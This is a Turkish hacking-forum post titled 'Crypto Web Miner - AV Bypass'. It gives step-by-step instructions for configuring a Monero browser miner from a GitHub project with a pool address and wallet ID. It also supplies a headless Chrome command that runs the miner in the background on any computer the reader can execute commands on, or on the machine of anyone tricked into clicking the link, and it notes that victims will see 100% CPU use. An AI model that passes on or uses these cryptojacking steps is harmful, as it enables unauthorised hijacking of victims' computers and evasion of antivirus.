Crypto Web Miner - AV Bypass (1 Viewer)

Joined
Jan 7, 2019
Credits
0
Rating - 0%
Merhaba,

AV yakalanmayan az getirsin ama getirsin diye kullanabileceğiniz monero miner paylaşımı aşağıdadır.

https://github.com/PiTi2k5/Crypto-Webminer

yükledikten sonra index.html içinde <!-- Javascript Constructor --> kısmında kullanacağınız pool adresini satırın son kısmına giriyoruz. Mevcutta kullanılan oceanstream gayet iyi sadece port 80 yapmanız yeterlidir bence..

Daha sonra scripts içinde gustav.js dosyası içinde " var siteKey = "nowalletinput"; " kısmında nowalletinput yerine monero adresimizi ve payment adresimizi yapıştırıyoruz. walletid.paymentid şeklinde ...

eğer ödeme ayarlarını yapmak istiyorsak PerfektStart(siteKey, "x", threads); kısmında x yerine x:[email protected] yazabilirsiniz. Burda [email protected] sizin şifreniz x ise worker adı. https://moneroocean.stream/#/dashboard adresinde track address kısmına walletid ve payment id yazdıktan sonra options kısmında istenen şifre bu şifre. Diğer pool sitelerinde de durum aynı(pool.supportxmr.com gibi). istediğiniz bir mail adresi yazabilirsiniz. formatı mail adresi olmak kaydıyla.. Burdaki amaç eğer şifreyle ayarlara girip minimum aktarım tutarını belirlemezseniz pool size hiçbir zaman aktarım yapmıyor. Biriktikçe birikiyor. Normalde zaten zor birikiyor da işte hayaller bir milyon :) benim önerim 0.3xmr olarak min. tutarı ayarlamanız. Hatta ayarlama bittikten sonra tekrar gustav.js dosyasına girip şifredeki maili ortadan kaldırabilirsiniz. Bu arada "share accepted" olmadan bu ayarlara giremiyorsunuz.. Yani bir 10 dk beklemek lazım kazmaya başladıktan sonra..

Artık kazmaya geçebilmek için bunların hepsini bir webserverda yayınlamamız lazım.. (Ücretli kısım - sms karşılığında nasıl ücretsiz ve güvenli bir https adresinde yayınlanır anlatılır :) ) scripts klasörünü ve index.html dosyasını yayınlamayı hallettiğimize göre artık birine bunu Chrome'da tıklattırmak veya komut çalıştırma yetkimiz olan herhangi bir bilgisayarda arka planda çalıştırmak kaldı. (ne yazıkki internet explorer da çalışmıyor.)

Gayet zor bir kısım aslında ama ben şöyle çözdüm..

cmd /c Start chrome --headless --remote-debugging-port=9090 https://example.domain.com

Burda remote port önemli değil istediğinizi yazabilirsiniz. Önemli olan sizin yayın yaptığınız adres. Adrese tıklayan herkes anında size monero kazmaya başlar. Tabi bir de arka planda chrome kafayı yemiş %100 cpu tüketiyor olarak göreceklerdir..
Like alınır :)

Sevgiler Saygılar..
 

Users who are viewing this thread

Top